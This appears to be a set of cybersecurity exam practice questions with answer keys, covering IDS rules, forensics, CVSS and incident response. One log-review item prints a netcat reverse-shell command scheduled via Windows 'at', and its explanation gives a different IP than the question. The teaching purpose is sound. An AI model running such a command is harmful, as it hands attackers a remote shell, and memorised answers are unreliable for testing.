A. The rule header is set to alert only on TCP packets based on this IDS rule's first line. The flow condition is set as "to_client,established," which means that only inbound traffic will be analyzed against this rule and only inbound traffic for connections that are already established. Therefore, this rule will alert on an inbound malicious TCP packet only when the packet matches all the conditions listed in this rule. This rule is an example of a Snort IDS rule.
You are reviewing a rule within your organization's IDS. You see the following output: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET anymsg: "BROWSER-IE Microsoft Internet ExplorerCacheSize exploit attempt";flow: to_client,established;file_data;content:"recordset"; offset:14; depth:9;content:".CacheSize"; distance:0; within:100;pcre:"/CacheSize\s*=\s*/";byte_test:10,>,0x3ffffffe,0,relative,string;max-detect-ips drop, service http;reference:cve,2016-8077;classtype: attempted-user;sid:65535;rev:1; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Based on this rule, which of the following malicious packets would this IDS alert on? A. An inbound malicious TCP packet B. Any outbound malicious packets C. An outbound malicious TCP packet D. Any inbound malicious packets
B. When collecting evidence, you should always follow the order of volatility. This will allow you to collect the most volatile evidence (most likely to change) first and the least volatile (least likely to change) last. You should always begin collecting the CPU registers and cache memory (L1/L2/L3/GPU). The contents of system memory (RAM), including a routing table, ARP cache, process tables, kernel statistics, and temporary file systems/swap space/virtual memory. Next, you would move onto the collection of data storage devices like hard drives, SSDs, and flash memory devices. After that, you would move onto less volatile data such as backup tapes, external media devices (hard drives, DVDs, etc.), and even configuration data or network diagrams.
You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first? A. Image of the server's SSD B. L3 cache C. Backup tapes D. ARP cache
C. The TRACERT (trace route) diagnostic utility determines the route to a destination by sending Internet Control Message Protocol (ICMP) echo packets to the destination. In these packets, TRACERT uses varying IP Time-To-Live (TTL) values. When the TTL on a packet reaches zero (0), the router sends an ICMP "Time Exceeded" message back to the source computer. The ICMP "Time Exceeded" messages that intermediate routers send back show the route.
You are troubleshooting a network connectivity issue and need to determine the packet's flow path from your system to the remote server. Which of the following tools would best help you identify the path between the two systems? A. ipconfig B. netstat C. tracert D. nbtstat
A. The code is setting up a task using Windows Task Scheduler (at). This task will run netcat (nc.exe) each day at the specified time (10:42). This is the netcat program and is being run from the c:\temp directory to create a reverse shell by executing the command shell (-e cmd.exe) and connecting it back to the attacker's machine at 172.16.34.12 over port 443.
You have just begun an investigation by reviewing the security logs. During the log review, you notice the following lines of code: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- sc config schedule start auto net start schedule at 10:42 "" c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe "" -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-What BEST describes what is occurring and what action do you recommend to stop it? A. The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to 123.12.34.12; you should recommend removing the host from the network B. The host (123.12.34.12) is running nc.exe from the temp directory at 10:42 using the auto cron job remotely; No recommendation is required since this is not malicious activity C. The host is beaconing to 123.12.34.12 every day at 10:42 by running nc.exe from the temp directory; you should recommend removing the host from the network D. The host (123.12.34.12) is a rogue device on the network; you should recommend removing the host from the network
A, B, D, F.
You identified a critical vulnerability in one of your organization's databases. You researched a solution, but it will require the server to be taken offline during the patch installation. You have received permission from the Change Advisory Board to implement this emergency change at 11 pm once everyone has left the office. It is now 3 pm; what action(s) should you take now to best prepare for implementing this evening's change? (SELECT ALL THAT APPLY) A. Ensure all stakeholders are informed of the planned outage B. Document the change in the change management system C. Take the server offline at 10 pm in preparation for the change D. Identify any potential risks associated with installing the patch E. Take the opportunity to install a new feature pack that has been requested F. Validate the installation of the patch in a staging environment
C. The attack vector explains what type of access that the attacker must have to a system or network and does not refer to the types of specialized conditions that must exist. In this case, the A rating refers to Adjacent, where the attacker must launch the attack from the same shared physical (such as Bluetooth or Wi-Fi network), logical network (such as a local subnet), or a limited administrative domain (such as a VPN or MPLS). An attack vector of Network (N) would allow the attack to extend beyond these options and conduct remote exploitation of the vulnerability. An attack vector of Local (L) would require the attacker to locally exploit the workstation via the keyboard or over an SSH connection. An attack vector of Physical (P) would require the attacker to physically touch or manipulate the vulnerable component themselves, such as conducting a cold boot attack.
You were interpreting a Nessus vulnerability scan report and identified a vulnerability in the system with a CVSS attack vector rating of A. Based on this information, which of the following statements would be true? A. The attacker must have physical or logical access to the affected system B. Exploiting the vulnerability requires the existence of specialized conditions C. The attacker must have access to the local network that the system is connected to D. Exploiting the vulnerability does not require any specialized conditions
B. To maintain a disciplined approach to incident response, the organization needs to document and follow procedures developed during the preparation phase. The SOC should have a call list or an escalation list as part of those procedures. This list should detail who should be called, what order, and how high up the organizational leadership chart a particular issue would reach. In almost every case, the incident response team lead should be contacted before the CEO or CIO is notified of the incident. When companies go "right to the top" of the leadership chart, the CEO and CIO will be acting on half-true or unverified information during the start of an incident response process.
You work as the incident response team lead at Fail to Pass Systems. Sierra, a system administrator, believes an incident has occurred on the network and contacts the SOC. At 2:30 am, you are woken up by a phone call from the CEO of Fail to Pass stating an incident has occurred and that you need to solve this immediately. As you are getting dressed to drive into the office, your phone rings again. This time, the CIO starts asking you a lot of technical questions about the incident. The first you heard of this incident was 5 minutes ago from the CEO, so you obviously don't have the answers to the CIO's questions. Based on this scenario, which of the following issues needs to be documented in your lessons learned report once this incident is resolved? A. An established incident response form for all employees to use to collect data B. A call list/escalation list C. A robust method of incident detection D. An offline incident response jump bag or kit
B. To mitigate the risk of data remanence, you should implement full disk encryption. This method will ensure that all data is encrypted and cannot be exposed to other organizations or the underlying IaaS provider.
Your company is making a significant investment in infrastructure-as-a-service (IaaS) hosting to replace its data centers. Which of the following techniques should be used to mitigate the risk of data remanence when moving virtual hosts from one server to another in the cloud? A. Zero-wipe drives before moving systems B. Use full-disk encryption C. Use data masking D. Span multiple virtual disks to fragment data